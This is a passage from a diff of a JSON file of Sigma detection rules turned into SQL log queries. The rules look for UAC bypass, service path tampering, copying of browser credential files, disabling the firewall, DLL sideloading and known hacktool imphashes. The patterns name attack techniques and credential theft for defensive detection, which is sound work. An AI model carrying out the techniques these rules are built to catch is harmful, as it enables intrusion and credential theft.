loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "Suspicious Service Path Modification", - "id": "138d3531-8793-4f50-a2cd-f291b2863d78", - "status": "test", - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - Image", + "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "status": "experimental", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 
'%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_sc_service_path_modification.yml" + "filename": "image_load_alternate_powershell_hosts_moduleload.yml" }, { - 
"title": "Potential Browser Data Stealing", - "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", - "status": "experimental", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Azure Browser SSO Abuse", + "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "status": "test", + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "author": "Den Iuzvyk", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "False positives are expected since this rules is only looking for the DLL load event. 
This rule is better used in correlation with related activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\') OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_susp_copy_browser_data.yml" + "filename": "image_load_abusing_azure_browser_sso.yml" }, { - "title": "Windows Firewall Disabled via PowerShell", - "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "status": "experimental", - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "author": "Tim Rauch", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND 
CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_disable_firewall.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Code Execution via Pcwutl.dll", - "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "status": "test", - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Use of Program Compatibility Troubleshooter Helper" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwutl.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "Suspicious Splwow64 Without Params", - "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", + "title": "WMI Modules Loaded", + "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", "status": "test", - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects non wmiprvse loading WMI modules", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_splwow64_cli_anomaly.yml" + "filename": "image_load_wmi_module_load.yml" }, { - "title": "SOURGUM Actor Behaviours", - "id": 
"7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "status": "test", - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", - "author": "MSTIC, FPT.EagleEye", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "status": "experimental", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows 
Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', 
'3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 
'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR 
Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE 